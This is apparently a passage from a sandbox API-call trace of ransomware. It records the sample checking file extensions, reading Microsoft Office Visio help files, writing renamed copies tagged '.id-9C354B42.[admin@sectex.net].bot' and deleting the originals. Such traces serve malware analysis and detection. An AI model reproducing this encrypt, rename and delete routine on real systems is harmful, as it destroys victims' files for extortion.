	[0152.721] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0152.721] lstrlenW (lpString=".bz2") returned 4
	[0152.721] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0152.721] lstrlenW (lpString=".7z") returned 3
	[0152.722] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0152.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_F_COL.HXK") returned 67
	[0152.722] lstrlenW (lpString=".dbf") returned 4
	[0152.722] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0152.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_F_COL.HXK") returned 67
	[0152.722] lstrlenW (lpString=".1cd") returned 4
	[0152.722] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0152.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_F_COL.HXK") returned 67
	[0152.722] lstrlenW (lpString=".jpg") returned 4
	[0152.722] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0152.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_F_COL.HXK") returned 67
	[0152.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_F_COL.HXK") returned 67
	[0152.722] lstrlenW (lpString=".doc") returned 4
	[0152.722] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0152.722] lstrlenW (lpString=".docx") returned 5
	[0152.722] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0152.722] lstrlenW (lpString=".pdf") returned 4
	[0152.722] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0152.722] lstrlenW (lpString=".xls") returned 4
	[0152.722] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0152.722] lstrlenW (lpString=".xlsx") returned 5
	[0152.722] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0152.722] lstrlenW (lpString=".ppt") returned 4
	[0152.722] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0152.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_F_COL.HXK") returned 67
	[0152.722] lstrlenW (lpString=".zip") returned 4
	[0152.722] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0152.722] lstrlenW (lpString=".rar") returned 4
	[0152.722] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0152.722] lstrlenW (lpString=".bz2") returned 4
	[0152.723] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0152.723] lstrlenW (lpString=".7z") returned 3
	[0152.723] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0152.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_F_COL.HXK") returned 67
	[0152.723] lstrlenW (lpString=".dbf") returned 4
	[0152.723] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0152.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_F_COL.HXK") returned 67
	[0152.723] lstrlenW (lpString=".1cd") returned 4
	[0152.723] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0152.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_F_COL.HXK") returned 67
	[0152.723] lstrlenW (lpString=".jpg") returned 4
	[0152.723] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0152.723] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0152.723] lstrlenW (lpString="VISIO.DEV_K_COL.HXK") returned 19
	[0152.723] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.dev_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0152.724] GetFileSizeEx (in: hFile=0x3f8, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=113) returned 1
	[0152.724] CloseHandle (hObject=0x3f8) returned 1
	[0152.724] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.dev_k_col.hxk")) returned 0x20
	[0152.724] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.dev_k_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.724] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.dev_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0152.724] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.724] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.724] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.dev_k_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0152.725] GetLastError () returned 0x0
	[0152.725] ReadFile (in: hFile=0x3f8, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x71, lpOverlapped=0x0) returned 1
	[0152.726] WriteFile (in: hFile=0x3c8, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0152.727] ReadFile (in: hFile=0x3f8, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0152.727] WriteFile (in: hFile=0x3c8, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xfa, lpOverlapped=0x0) returned 1
	[0152.727] SetEndOfFile (hFile=0x3c8) returned 1
	[0152.727] CloseHandle (hObject=0x3c8) returned 1
	[0152.727] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.727] SetEndOfFile (hFile=0x3f8) returned 1
	[0152.730] CloseHandle (hObject=0x3f8) returned 1
	[0152.730] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0152.730] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.dev_k_col.hxk")) returned 1
	[0152.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_K_COL.HXK") returned 67
	[0152.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_K_COL.HXK") returned 67
	[0152.731] lstrlenW (lpString=".doc") returned 4
	[0152.731] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0152.731] lstrlenW (lpString=".docx") returned 5
	[0152.731] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0152.731] lstrlenW (lpString=".pdf") returned 4
	[0152.731] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0152.731] lstrlenW (lpString=".xls") returned 4
	[0152.731] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0152.731] lstrlenW (lpString=".xlsx") returned 5
	[0152.731] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0152.731] lstrlenW (lpString=".ppt") returned 4
	[0152.731] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0152.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_K_COL.HXK") returned 67
	[0152.732] lstrlenW (lpString=".zip") returned 4
	[0152.732] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0152.732] lstrlenW (lpString=".rar") returned 4
	[0152.732] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0152.732] lstrlenW (lpString=".bz2") returned 4
	[0152.732] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0152.732] lstrlenW (lpString=".7z") returned 3
	[0152.732] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0152.732] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_K_COL.HXK") returned 67
	[0152.732] lstrlenW (lpString=".dbf") returned 4
	[0152.732] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0152.732] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_K_COL.HXK") returned 67
	[0152.732] lstrlenW (lpString=".1cd") returned 4
	[0152.732] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0152.732] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_K_COL.HXK") returned 67
	[0152.732] lstrlenW (lpString=".jpg") returned 4
	[0152.732] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0152.732] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_K_COL.HXK") returned 67
	[0152.732] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_K_COL.HXK") returned 67
	[0152.732] lstrlenW (lpString=".doc") returned 4
	[0152.732] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0152.732] lstrlenW (lpString=".docx") returned 5
	[0152.732] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0152.732] lstrlenW (lpString=".pdf") returned 4
	[0152.732] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0152.732] lstrlenW (lpString=".xls") returned 4
	[0152.732] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0152.732] lstrlenW (lpString=".xlsx") returned 5
	[0152.732] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0152.732] lstrlenW (lpString=".ppt") returned 4
	[0152.732] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0152.733] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_K_COL.HXK") returned 67
	[0152.733] lstrlenW (lpString=".zip") returned 4
	[0152.733] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0152.733] lstrlenW (lpString=".rar") returned 4
	[0152.733] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0152.733] lstrlenW (lpString=".bz2") returned 4
	[0152.733] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0152.733] lstrlenW (lpString=".7z") returned 3
	[0152.733] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0152.733] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_K_COL.HXK") returned 67
	[0152.733] lstrlenW (lpString=".dbf") returned 4
	[0152.733] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0152.733] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_K_COL.HXK") returned 67
	[0152.733] lstrlenW (lpString=".1cd") returned 4
	[0152.733] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0152.733] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_K_COL.HXK") returned 67
	[0152.733] lstrlenW (lpString=".jpg") returned 4
	[0152.733] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0152.733] lstrcmpiW (lpString1=".HXS", lpString2=".bot") returned 1
	[0152.733] lstrlenW (lpString="VISIO.HXS") returned 9
	[0152.733] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.hxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0152.734] GetFileSizeEx (in: hFile=0x3f8, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=2839338) returned 1
	[0152.734] CloseHandle (hObject=0x3f8) returned 1
	[0152.734] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.hxs")) returned 0x20
	[0152.734] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.734] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0152.734] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.HXS") returned 57
	[0152.734] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.HXS") returned 57
	[0152.734] lstrlenW (lpString=".doc") returned 4
	[0152.734] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0152.734] lstrlenW (lpString=".docx") returned 5
	[0152.734] lstrcmpiW (lpString1=".docx", lpString2="O.HXS") returned -1
	[0152.734] lstrlenW (lpString=".pdf") returned 4
	[0152.734] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0152.735] lstrlenW (lpString=".xls") returned 4
	[0152.735] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0152.735] lstrlenW (lpString=".xlsx") returned 5
	[0152.735] lstrcmpiW (lpString1=".xlsx", lpString2="O.HXS") returned -1
	[0152.735] lstrlenW (lpString=".ppt") returned 4
	[0152.735] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0152.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.HXS") returned 57
	[0152.735] lstrlenW (lpString=".zip") returned 4
	[0152.735] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0152.735] lstrlenW (lpString=".rar") returned 4
	[0152.735] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0152.735] lstrlenW (lpString=".bz2") returned 4
	[0152.735] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0152.735] lstrlenW (lpString=".7z") returned 3
	[0152.735] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0152.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.HXS") returned 57
	[0152.735] lstrlenW (lpString=".dbf") returned 4
	[0152.735] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0152.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.HXS") returned 57
	[0152.735] lstrlenW (lpString=".1cd") returned 4
	[0152.735] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0152.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.HXS") returned 57
	[0152.735] lstrlenW (lpString=".jpg") returned 4
	[0152.735] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0152.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.HXS") returned 57
	[0152.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.HXS") returned 57
	[0152.735] lstrlenW (lpString=".doc") returned 4
	[0152.735] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0152.735] lstrlenW (lpString=".docx") returned 5
	[0152.735] lstrcmpiW (lpString1=".docx", lpString2="O.HXS") returned -1
	[0152.736] lstrlenW (lpString=".pdf") returned 4
	[0152.736] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0152.736] lstrlenW (lpString=".xls") returned 4
	[0152.736] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0152.736] lstrlenW (lpString=".xlsx") returned 5
	[0152.736] lstrcmpiW (lpString1=".xlsx", lpString2="O.HXS") returned -1
	[0152.736] lstrlenW (lpString=".ppt") returned 4
	[0152.736] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0152.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.HXS") returned 57
	[0152.736] lstrlenW (lpString=".zip") returned 4
	[0152.736] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0152.736] lstrlenW (lpString=".rar") returned 4
	[0152.736] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0152.736] lstrlenW (lpString=".bz2") returned 4
	[0152.736] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0152.736] lstrlenW (lpString=".7z") returned 3
	[0152.736] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0152.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.HXS") returned 57
	[0152.736] lstrlenW (lpString=".dbf") returned 4
	[0152.736] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0152.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.HXS") returned 57
	[0152.736] lstrlenW (lpString=".1cd") returned 4
	[0152.736] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0152.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.HXS") returned 57
	[0152.736] lstrlenW (lpString=".jpg") returned 4
	[0152.736] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0152.736] lstrcmpiW (lpString1=".HXS", lpString2=".bot") returned 1
	[0152.737] lstrlenW (lpString="VISIO.SHAPESHEET.HXS") returned 20
	[0152.737] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.shapesheet.hxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0152.737] GetFileSizeEx (in: hFile=0x3f8, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=879814) returned 1
	[0152.737] CloseHandle (hObject=0x3f8) returned 1
	[0152.737] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.shapesheet.hxs")) returned 0x20
	[0152.737] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.shapesheet.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.737] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.shapesheet.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0152.738] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.738] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.738] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.shapesheet.hxs.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0152.738] GetLastError () returned 0x0
	[0152.738] ReadFile (in: hFile=0x3f8, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0xd6cc6, lpOverlapped=0x0) returned 1
	[0152.757] WriteFile (in: hFile=0x3c8, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xd6cd0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xd6cd0, lpOverlapped=0x0) returned 1
	[0153.179] ReadFile (in: hFile=0x3f8, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.179] WriteFile (in: hFile=0x3c8, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xfc, lpOverlapped=0x0) returned 1
	[0153.179] SetEndOfFile (hFile=0x3c8) returned 1
	[0153.179] CloseHandle (hObject=0x3c8) returned 1
	[0153.179] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.179] SetEndOfFile (hFile=0x3f8) returned 1
	[0153.198] CloseHandle (hObject=0x3f8) returned 1
	[0153.198] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET.HXS.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.319] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.shapesheet.hxs")) returned 1
	[0153.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET.HXS") returned 68
	[0153.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET.HXS") returned 68
	[0153.319] lstrlenW (lpString=".doc") returned 4
	[0153.319] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0153.319] lstrlenW (lpString=".docx") returned 5
	[0153.319] lstrcmpiW (lpString1=".docx", lpString2="T.HXS") returned -1
	[0153.319] lstrlenW (lpString=".pdf") returned 4
	[0153.319] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0153.320] lstrlenW (lpString=".xls") returned 4
	[0153.320] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0153.320] lstrlenW (lpString=".xlsx") returned 5
	[0153.320] lstrcmpiW (lpString1=".xlsx", lpString2="T.HXS") returned -1
	[0153.320] lstrlenW (lpString=".ppt") returned 4
	[0153.320] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0153.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET.HXS") returned 68
	[0153.320] lstrlenW (lpString=".zip") returned 4
	[0153.320] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0153.320] lstrlenW (lpString=".rar") returned 4
	[0153.320] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0153.320] lstrlenW (lpString=".bz2") returned 4
	[0153.320] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0153.320] lstrlenW (lpString=".7z") returned 3
	[0153.320] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0153.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET.HXS") returned 68
	[0153.320] lstrlenW (lpString=".dbf") returned 4
	[0153.320] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0153.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET.HXS") returned 68
	[0153.320] lstrlenW (lpString=".1cd") returned 4
	[0153.320] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0153.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET.HXS") returned 68
	[0153.320] lstrlenW (lpString=".jpg") returned 4
	[0153.320] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0153.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET.HXS") returned 68
	[0153.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET.HXS") returned 68
	[0153.320] lstrlenW (lpString=".doc") returned 4
	[0153.320] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0153.320] lstrlenW (lpString=".docx") returned 5
	[0153.320] lstrcmpiW (lpString1=".docx", lpString2="T.HXS") returned -1
	[0153.321] lstrlenW (lpString=".pdf") returned 4
	[0153.321] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0153.321] lstrlenW (lpString=".xls") returned 4
	[0153.321] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0153.321] lstrlenW (lpString=".xlsx") returned 5
	[0153.321] lstrcmpiW (lpString1=".xlsx", lpString2="T.HXS") returned -1
	[0153.321] lstrlenW (lpString=".ppt") returned 4
	[0153.321] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0153.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET.HXS") returned 68
	[0153.321] lstrlenW (lpString=".zip") returned 4
	[0153.321] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0153.321] lstrlenW (lpString=".rar") returned 4
	[0153.321] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0153.321] lstrlenW (lpString=".bz2") returned 4
	[0153.321] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0153.321] lstrlenW (lpString=".7z") returned 3
	[0153.321] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0153.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET.HXS") returned 68
	[0153.321] lstrlenW (lpString=".dbf") returned 4
	[0153.321] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
